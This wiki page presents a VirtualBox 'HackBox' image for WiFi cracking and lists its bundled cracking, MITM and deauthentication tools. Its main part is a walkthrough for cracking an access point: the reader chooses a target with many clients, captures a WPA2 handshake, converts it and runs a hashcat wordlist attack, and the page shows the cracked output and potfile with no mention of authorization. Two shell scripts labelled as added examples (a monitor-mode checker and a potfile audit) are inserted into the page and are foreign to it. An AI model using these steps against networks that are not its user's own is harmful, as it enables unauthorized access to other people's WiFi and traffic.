EHVSN HackBox v1

Introduction

This is a VirtualBox VM that has been optimized for WiFi cracking. The HackBox is capable of more than just that ;-) but in this release we focus on WiFi hacking. Thanks to the pre-installed VirtualBox guest additions, this image gives you a better resolution and bi-directional clipboard sharing, which vastly enhance the VirtualBox experience. To use it for WiFi cracking, however, you need a USB WiFi adapter that supports monitor mode. This box features tools like Fluxion and Infernal-Wireless, but also lets you hack WiFi networks manually as described in the tutorial on this page. For tutorials on Fluxion/Infernal-Wireless I refer you to YouTube or other sources, as there are many good ones out there already.

Logins:
user: ethicalhacker
pass: [email protected]!
user: root
pass: [email protected]!

The VM comes pre-installed with a lot of essentials that are also used in other cracking/hacking procedures, which makes it a nice base for anyone to expand on:

virtualbox-additions
libboost-all-dev
libpam-dev
libbz2-dev
rexgen
RTL8812AU/21AU and RTL8814AU driver with monitor mode and frame injection

JohnTheRipper Jumbo

This image comes with John the Ripper v1.8.0.11-jumbo-1-bleeding. There is John the Ripper and there is John the Ripper Pro; Pro adds support for Windows NTLM (MD4-based) and Mac OS X 10.4+ salted SHA-1 hashes. This “Community enhanced” / jumbo version adds support for many more password hash types, including:

Windows NTLM (MD4-based),
Mac OS X 10.4-10.6 salted SHA-1 hashes,
Mac OS X 10.7 salted SHA-512 hashes,
raw MD5 and SHA-1,
arbitrary MD5-based “web application” password hash types,
hashes used by SQL database servers (MySQL, MS SQL, Oracle) and by some LDAP servers,
several hash types used on OpenVMS, password hashes of the Eggdrop IRC bot,
and lots of other hash types,
as well as many non-hashes such as OpenSSH private keys, S/Key skeykeys files, Kerberos TGTs, PDF files, ZIP (classic PKZIP and WinZip/AES) and RAR archives.

To start JTR:
1. Navigate to /home/ethicalhacker/JohnTheRipper-bleeding-jumbo/run/
2. Run ./john (alternatively, run PATH=$PWD:$PATH first to add this directory to your PATH so john is accessible from any directory)

Hashcat

World's best and most powerful password cracker. Supported hash types:

MD4 MD5 Half MD5 (left, mid, right) SHA1 SHA-224 SHA-256 SHA-384 SHA-512 SHA-3 (Keccak) BLAKE2b-512 SipHash Skip32 RIPEMD-160 Whirlpool DES (PT = $salt, key = $pass) 3DES (PT = $salt, key = $pass) ChaCha20 GOST R 34.11-94 GOST R 34.11-2012 (Streebog) 256-bit GOST R 34.11-2012 (Streebog) 512-bit md5($pass.$salt) md5($salt.$pass) md5(unicode($pass).$salt) md5($salt.unicode($pass)) md5($salt.$pass.$salt) md5($salt.md5($pass)) md5($salt.md5($salt.$pass)) md5($salt.md5($pass.$salt)) md5(md5($pass)) md5(md5($pass).md5($salt)) md5(strtoupper(md5($pass))) md5(sha1($pass)) sha1($pass.$salt) sha1($salt.$pass) sha1(unicode($pass).$salt) sha1($salt.unicode($pass)) sha1(sha1($pass)) sha1($salt.sha1($pass)) sha1(md5($pass)) sha1($salt.$pass.$salt) sha1(CX) sha256($pass.$salt) sha256($salt.$pass) sha256(unicode($pass).$salt) sha256($salt.unicode($pass)) sha512($pass.$salt) sha512($salt.$pass) sha512(unicode($pass).$salt) sha512($salt.unicode($pass)) HMAC-MD5 (key = $pass) HMAC-MD5 (key = $salt) HMAC-SHA1 (key = $pass) HMAC-SHA1 (key = $salt) HMAC-SHA256 (key = $pass) HMAC-SHA256 (key = $salt) HMAC-SHA512 (key = $pass) HMAC-SHA512 (key = $salt) PBKDF2-HMAC-MD5 PBKDF2-HMAC-SHA1 PBKDF2-HMAC-SHA256 PBKDF2-HMAC-SHA512 MyBB phpBB3 SMF (Simple Machines Forum) vBulletin IPB (Invision Power Board) WBB (Woltlab Burning Board) osCommerce xt:Commerce PrestaShop MediaWiki B type WordPress Drupal 7 Joomla PHPS Django (SHA-1) Django (PBKDF2-SHA256) Episerver ColdFusion 10+ Apache MD5-APR MySQL PostgreSQL MSSQL Oracle H: Type (Oracle 7+) Oracle S: Type (Oracle 11+) Oracle T: Type (Oracle 12+) Sybase hMailServer DNSSEC (NSEC3) IKE-PSK IPMI2 RAKP iSCSI CHAP CRAM-MD5 MySQL CRAM (SHA1) PostgreSQL CRAM (MD5) SIP digest authentication (MD5) WPA/WPA2 WPA/WPA2 PMK NetNTLMv1 NetNTLMv1+ESS NetNTLMv2 Kerberos 5 AS-REQ Pre-Auth etype 23 Kerberos 5 TGS-REP etype 23 Netscape LDAP SHA/SSHA FileZilla Server LM NTLM Domain Cached Credentials (DCC), MS Cache Domain Cached Credentials 2 (DCC2), MS Cache 2 DPAPI 
masterkey file v1 and v2 MS-AzureSync PBKDF2-HMAC-SHA256 descrypt bsdicrypt md5crypt sha256crypt sha512crypt bcrypt scrypt macOS v10.4 macOS v10.5 macOS v10.6 macOS v10.7 macOS v10.8 macOS v10.9 macOS v10.10 iTunes backup < 10.0 iTunes backup >= 10.0 AIX {smd5} AIX {ssha1} AIX {ssha256} AIX {ssha512} Cisco-ASA MD5 Cisco-PIX MD5 Cisco-IOS $1$ (MD5) Cisco-IOS type 4 (SHA256) Cisco $8$ (PBKDF2-SHA256) Cisco $9$ (scrypt) Juniper IVE Juniper NetScreen/SSG (ScreenOS) Juniper/NetBSD sha1crypt Fortigate (FortiOS) Samsung Android Password/PIN Windows Phone 8+ PIN/password GRUB 2 CRC32 RACF Radmin2 Redmine PunBB OpenCart Atlassian (PBKDF2-HMAC-SHA1) Citrix NetScaler SAP CODVN B (BCODE) SAP CODVN F/G (PASSCODE) SAP CODVN H (PWDSALTEDHASH) iSSHA-1 PeopleSoft PeopleSoft PS_TOKEN Skype WinZip 7-Zip RAR3-hp RAR5 AxCrypt AxCrypt in-memory SHA1 PDF 1.1 - 1.3 (Acrobat 2 - 4) PDF 1.4 - 1.6 (Acrobat 5 - 8) PDF 1.7 Level 3 (Acrobat 9) PDF 1.7 Level 8 (Acrobat 10 - 11) MS Office <= 2003 MD5 MS Office <= 2003 SHA1 MS Office 2007 MS Office 2010 MS Office 2013 Lotus Notes/Domino 5 Lotus Notes/Domino 6 Lotus Notes/Domino 8 Bitcoin/Litecoin wallet.dat Blockchain, My Wallet Blockchain, My Wallet, V2 1Password, agilekeychain 1Password, cloudkeychain LastPass Password Safe v2 Password Safe v3 KeePass 1 (AES/Twofish) and KeePass 2 (AES) JKS Java Key Store Private Keys (SHA1) Ethereum Wallet, PBKDF2-HMAC-SHA256 Ethereum Wallet, SCRYPT eCryptfs Android FDE <= 4.3 Android FDE (Samsung DEK) TrueCrypt VeraCrypt LUKS Plaintext

Have a look at some great John the Ripper examples here: http://www.openwall.com/john/doc/EXAMPLES.shtml

Fluxion

Fluxion is the future of MITM WPA attacks. Fluxion is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. It's compatible with the latest release of Kali (rolling). The attack is mostly manual, but experimental versions will automatically handle most functionality from the stable releases.

To start it, fire up a terminal, navigate to /home/ethicalhacker/entropy1337-infernal-twin-622a679 and execute ./fluxion.sh

Infernal-Wireless

This tool was created to aid penetration testers in assessing wireless security.

Features:

GUI Wireless security assessment SUITE
Implemented:
WPA2 hacking
WEP Hacking
WPA2 Enterprise hacking
Wireless Social Engineering
SSL Strip
Report generation
PDF Report
HTML Report
Note taking function
Data is saved into Database
Network mapping
MiTM
Probe Request

To run it:
1. Navigate to /home/ethicalhacker/entropy1337-infernal-twin-622a679/
2. Run python Infernal-Twin.py

HCXTOOLS

A small set of tools to capture and convert packets from wlan devices (h = hash, c = capture, convert and calculate candidates, x = different hash types) for use with the latest hashcat or John the Ripper. The tools are 100% compatible with hashcat and John the Ripper and are recommended by hashcat. This branch is closely synced to the hashcat git branch (that is, the latest hcxtools matches the latest hashcat beta) and the John the Ripper git branch (“bleeding-jumbo”).

Support for hashcat hash-modes: 2500, 2501, 4800, 5500, 12000, 16100

Support for John the Ripper hash-modes: WPAPSK-PMK, PBKDF2-HMAC-SHA1, chap, netntlm, tacacs-plus

After capturing, upload the “uncleaned” cap here (http://wpa-sec.stanev.org/?submit) to see whether your AP or the client is vulnerable to common wordlists. Convert the cap to hccapx and check whether a wlan key or plainmasterkey was transmitted unencrypted.

wlandump-ng Small, fast and powerful deauthentication/authentication/response tool
wlanrcascan Small, fast and simple passive WLAN channel assignment scanner (status output)
wlancapinfo Shows info of pcap file
wlancap2hcx Converts cap to hccapx and other formats (recommended for use with wlandump-ng)
wlanhcx2cap Converts hccapx to cap
wlanhc2hcx Converts hccap to hccapx
wlanwkp2hcx Converts wpk (ElcomSoft EWSA project file) to hccapx
wlanhcx2essid Merges hccapx containing the same ESSID
wlanhcx2ssid Strips BSSID, ESSID, OUI
wlanhcxinfo Shows detailed info from contents of hccapxfile
wlanhcxmnc Helps to calculate hashcat's nonce-error-corrections value on byte number xx of an anonce
wlanhashhcx Generate hashlist from hccapx hashfile (md5_64 hash:mac_ap:mac_sta:essid)
wlanhcxcat Simple password recovery tool for WPA/WPA2/WPA2 SHA256 AES-128-CMAC (hash-modes 2500, 2501)
wlanpmk2hcx Converts plainmasterkey and ESSID for use with hashcat hash-mode 12000 or john PBKDF2-HMAC-SHA1
wlanjohn2hcx Converts john wpapsk hashfiles for use with hashcat hash-modes 2500, 2501
wlancow2hcxpmk Converts pre-computed cowpatty hashfiles for use with hashcat hash-mode 2501
wlanhcx2john Converts hccapx to format expected by John the Ripper
wlanhcx2psk Calculates candidates for hashcat based on the hccapx file
wlancap2wpasec Upload multiple caps to http://wpa-sec.stanev.org
whoismac Show vendor information and/or download oui reference list

wlandump-ng is able to prevent complete wlan traffic
wlandump-ng is able to capture handshakes from not connected clients (only one single M2 from the client is required)
wlandump-ng is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required)
wlandump-ng is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS)
wlandump-ng is able to capture passwords from the wlan traffic
wlandump-ng is able to capture plainmasterkeys from the wlan traffic
wlandump-ng is able to capture usernames and identities from the wlan traffic

Basic WiFi command line instructions

List all networking interfaces:
$ ifconfig -a

List wireless adapters:
$ iwconfig

Find out if your WiFi adapter has monitor mode:
$ iw list | grep monitor
No output: not supported. However, this doesn't always mean your device lacks monitor mode; in some cases you can find another WiFi driver that does support it.

Enable monitor mode using iwconfig (if supported):
$ iwconfig wlan0 mode monitor

Test/start the device in monitor mode:
$ airmon-ng start wlan0

Check if there are interfering processes:
$ airmon-ng check

Kill all interfering processes:
$ airmon-ng check kill

Using rfkill:
$ rfkill unblock wifi
$ rfkill unblock all

Display link quality:
$ iwconfig wlan0 | grep -i --color quality

Display signal level:
$ iwconfig wlan0 | grep -i --color signal

Show link quality on screen:
normal: $ cat /proc/net/wireless
auto-refresh: $ watch -n 1 cat /proc/net/wireless

Tools to manage wlan through shell
-wavemon
-connmanctl

Connmanctl example usage:
connmanctl scan wifi
connmanctl services

An alternative to connmanctl is “wavemon” which is also included in this distro.

Tutorial #1: Setup your HackBox VirtualBox

1. After you have downloaded this VBox image, import it into your VirtualBox installation as a 64-bit Debian Linux OS, using the downloaded disk image as the hard drive image. If you don't have VirtualBox installed yet, visit the download page here: https://www.virtualbox.org/wiki/Downloads

2. Install the “VirtualBox 5.2.2 Oracle VM VirtualBox Extension Pack” from the official site: https://www.virtualbox.org/wiki/Downloads . This VM ships with the guest additions pre-installed, but we need the extension pack on the host for full support.

3. We need to set up VirtualBox to pass the USB WiFi dongle through using a filter. Plug your WiFi dongle into the Windows host, select HackBox-EHVSN in VirtualBox's main window and click “Settings”, click “USB”, then click the green plus sign to add a new filter for a USB device; in the window that pops up, select your WiFi adapter.

4. IMPORTANT: once your HackBox has booted, select the USB device from the VM's USB device menu by clicking it, then PHYSICALLY DISCONNECT and RECONNECT the USB adapter. Check iwconfig or dmesg to see how the installation of the new device went. If it shows up as wlan0, it should be fine!

Tutorial #2: Preparing your station for WiFi hacking

Before we start hacking WiFi, we need a monitor-mode-capable USB WiFi dongle.

1. Find out if your WiFi adapter has monitor mode:

$ iw list | grep monitor

No output: not supported. However, this doesn't always mean your device lacks monitor mode; in some cases you can find another WiFi driver that does support it. In my case, I bought a Realtek 8812 USB WiFi adapter and no suitable drivers were found. I used https://github.com/astsam/rtl8812au and compiled it. If you want to change which USB model is supported, navigate in the shell to /home/ethicalhacker/rtl8812au-master/ and run the make target for one of the models this driver also supports:

make RTL8814=1
make RTL8812=1
make RTL8821=1

That's all you need to do; the new driver is installed automatically after compiling.

If you use this driver, you can change the txpower and increase the adapter's signal strength a little: “iwconfig wlan0 txpower 30” or “iw wlan0 set txpower fixed 3000”. If you try this with other drivers but don't see the txpower value change in the “iwconfig” output, it's because most drivers always report a hardcoded value of 12 dBm. If the device keeps reporting 12 dBm after you have run the commands to change the txpower value, changing it is simply not supported.
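A more precise version of the monitor-mode check used above and in the basic command list, added here as an example that is not part of the HackBox page or of iw/aircrack-ng: grepping for the word “monitor” anywhere in the output of iw list can match unrelated lines that merely contain that word, and with several adapters attached it doesn't tell you which phy supports it. This POSIX shell function reads iw list output on stdin, walks the “Supported interface modes:” and “software interface modes” blocks of each phy, and reports one verdict per phy. The sample iw output embedded below is constructed for the example, not captured from real hardware, and the parser assumes the usual iw layout (a “Wiphy phyN” header followed by indented “* mode” lines).

```shell
#!/bin/sh
# Per-phy monitor-mode check for "iw list" output.
# Usage on a live system:  iw list | iw_monitor_support
# Prints "<phy> monitor" or "<phy> no-monitor" for every phy found.

iw_monitor_support() {
    awk '
        # A new phy starts with "Wiphy phyN"; remember it and leave any mode block.
        /^Wiphy /                                    { phy = $2; seen[phy] = 0; in_modes = 0; next }
        # Both the hardware "Supported interface modes:" block and the
        # "software interface modes (can always be added):" block list usable modes.
        /^[ \t]*(Supported|software) interface modes/ { in_modes = 1; next }
        # Mode lines look like "  * monitor"; $1 is "*", $2 the mode name.
        in_modes && /^[ \t]*\* /                     { if ($2 == "monitor") seen[phy] = 1; next }
        # Any other line (e.g. "Supported commands:") ends the block, so a
        # command name containing "monitor" is never mistaken for a mode.
        in_modes                                     { in_modes = 0 }
        END {
            for (p in seen)
                printf "%s %s\n", p, (seen[p] ? "monitor" : "no-monitor")
        }
    ' | sort
}

# Constructed sample resembling "iw list" output for two phys (not real hardware output):
# phy0 advertises monitor mode, phy1 does not.
SAMPLE_IW_LIST='Wiphy phy0
        max # scan SSIDs: 4
        Supported interface modes:
                 * IBSS
                 * managed
                 * AP
                 * monitor
        software interface modes (can always be added):
                 * AP/VLAN
        Supported commands:
                 * new_interface
Wiphy phy1
        max # scan SSIDs: 4
        Supported interface modes:
                 * managed
                 * AP
        software interface modes (can always be added):
                 * AP/VLAN
        Supported commands:
                 * new_interface'

printf '%s\n' "$SAMPLE_IW_LIST" | iw_monitor_support
```

On the HackBox itself you would pipe the real output in with iw list | iw_monitor_support; if your adapter shows up as no-monitor, the driver options described above are the next thing to look at.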

2. Enable monitor mode using iwconfig (if supported):

$ iwconfig wlan0 mode monitor

3. Test/start the device in monitor mode:

$ airmon-ng start wlan0

If you experience problems starting monitor mode, another process or service may be locking the device.

1. Check if there are interfering processes:

$ airmon-ng check

2. Kill all interfering processes:

$ airmon-ng check kill

3. Unblock the adapter with rfkill:

$ rfkill unblock wifi

Tutorial #3: Manually cracking a WiFi accesspoint

1. Acquiring a target

Choose a target; if possible, pick one where you expect to see a lot of clients, the more the better! We need traffic going on!
Run wlandump-ng:
wlandump-ng -i <wlan0> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20

Hint: Don't capture from virtual adapters such as “mon0”

2. Analysis of the captured data

Alright, now we have data, right? Let's analyse the .cap output file:

$ wlancapinfo -i test.cap
input file.......: test.cap
magic file number: 0xa1b2c3d4 (cap/pcap)
major version....: 2
minor version....: 4
data link type...: 105 (DLT_IEEE802_11) [http://www.tcpdump.org/linktypes.html]
packets inside...: 6
last pcap error..: flawless

3. Converting the .cap output file

Convert the .cap output file using wlancap2hcx, because it contains information that other tools are not able to extract from it.

$ wlancap2hcx -o test.hccapx -e wordlist test.cap
start reading from test.cap
6 packets processed (6 wlan, 0 lan, 0 loopback)
found 1 wpa2 AES Cipher, HMAC-SHA1
found 1 valid wpa handshake (by wlandump-ng/wlanresponse)

You can see that there is a valid WPA2 handshake inside and that wlandump-ng/wlanresponse initiated the authentication with the client.
No access point was captured: there is no need to capture an access point to get the data!
We use the -e option to save network names and passwords to a file (it's a good idea to use this option every time you run wlancap2hcx).

4. Handling a wordlist

In this example, we sort our wordlist and remove duplicate entries (there may be dupes inside the wordlist, and we don't want to waste precious time!):
$ ls
test.hccapx test.cap wordlist
$ sort wordlist | uniq > wordlistsorted

5. Running Hashcat to crack the password

$ ls
test.hccapx test.cap wordlist wordlistsorted
$ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsorted
hashcat (v3.6.0-247-g8f2cbb26) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
Guess.Base.......: File (wordlistsorted)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 0 H/s (0.36ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2/2 (100.00%)
Rejected.........: 0/2 (0.00%)
Restore.Point....: 0/2 (0.00%)
Candidates.#1....: AXNDFNEU -> UPC501953949
HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8

6. Take a look in the potfile:

fc9e1bbae495367adea6b452e410bd9b:8c840109e9e6:bc4486a16682:UPC501953949:AXNDFNEU

Congratulations, you have cracked the hash using the password captured from the wireless traffic!
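Added example, not part of the HackBox page nor of hashcat or hcxtools: a small POSIX shell audit of a -m 2500 potfile such as the hc2500.pot shown above. It parses the hash:mac_ap:mac_sta:essid:psk fields, rejects malformed lines, prints the MACs in the AP:/STA: notation hashcat uses in its Hash.Target line, and flags recovered passphrases that fall below a minimum length. Run over the potfile from an assessment of your own access points, its output tells you which networks need a new passphrase. The sample potfile is constructed: its first line is the entry shown above, the other two are made up. MIN_PSK_LEN is an assumed local policy for this example, not a hashcat setting, and ESSIDs are assumed not to contain colons.

```shell
#!/bin/sh
# Audit of a hashcat -m 2500 potfile (one "hash:mac_ap:mac_sta:essid:psk" per line).
# Usage on a real file:  potfile_report < hc2500.pot
# Output per entry:  <essid> ap=<mac> sta=<mac> psk_len=<n> <verdict>
#   invalid : malformed line, or a passphrase outside the 8..63 characters WPA2 allows
#   short   : passphrase shorter than MIN_PSK_LEN
#   ok      : everything else
# MIN_PSK_LEN is an assumed local policy for this example, not a hashcat setting.
MIN_PSK_LEN=${MIN_PSK_LEN:-12}

# "8c840109e9e6" -> "8c:84:01:09:e9:e6", the AP:/STA: form hashcat prints in Hash.Target
colon_mac() {
    printf '%s\n' "$1" | sed 's/../&:/g; s/:$//'
}

# true when $1 is exactly $2 lowercase hex digits
is_hex() {
    [ "${#1}" -eq "$2" ] || return 1
    case "$1" in *[!0-9a-f]*|'') return 1 ;; esac
    return 0
}

potfile_report() {
    # The last variable of read receives the rest of the line, so a passphrase
    # containing ":" survives; an ESSID containing ":" does not (assumption of this example).
    while IFS=: read -r hash ap sta essid psk; do
        [ -n "$hash" ] || continue
        if ! is_hex "$hash" 32 || ! is_hex "$ap" 12 || ! is_hex "$sta" 12 || [ -z "$essid" ]; then
            printf '%s invalid\n' "$hash"
            continue
        fi
        len=${#psk}
        if [ "$len" -lt 8 ] || [ "$len" -gt 63 ]; then
            verdict=invalid
        elif [ "$len" -lt "$MIN_PSK_LEN" ]; then
            verdict=short
        else
            verdict=ok
        fi
        printf '%s ap=%s sta=%s psk_len=%s %s\n' \
            "$essid" "$(colon_mac "$ap")" "$(colon_mac "$sta")" "$len" "$verdict"
    done
}

# Constructed sample potfile: line 1 is the entry from the tutorial, lines 2 and 3 are made up.
SAMPLE_POT='fc9e1bbae495367adea6b452e410bd9b:8c840109e9e6:bc4486a16682:UPC501953949:AXNDFNEU
0123456789abcdef0123456789abcdef:001122334455:66778899aabb:LabNet-Guest:correct horse battery
not-a-potfile-line'

printf '%s\n' "$SAMPLE_POT" | potfile_report
```

The tutorial's own entry comes out as psk_len=8 short: eight characters is the minimum WPA2 accepts, which is exactly why a small wordlist found it so quickly.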

FAQ

To get dir colors as root, execute:
alias ls='ls -la --color=auto'

Download

HackBox v1:
Debian 9.2.1 64-Bit VirtualBox HDD: HackBox-EHVSN-disk1.7z 1.2GB

wiki/hackbox.txt · Last modified: 2018/01/27 09:27 by stephan
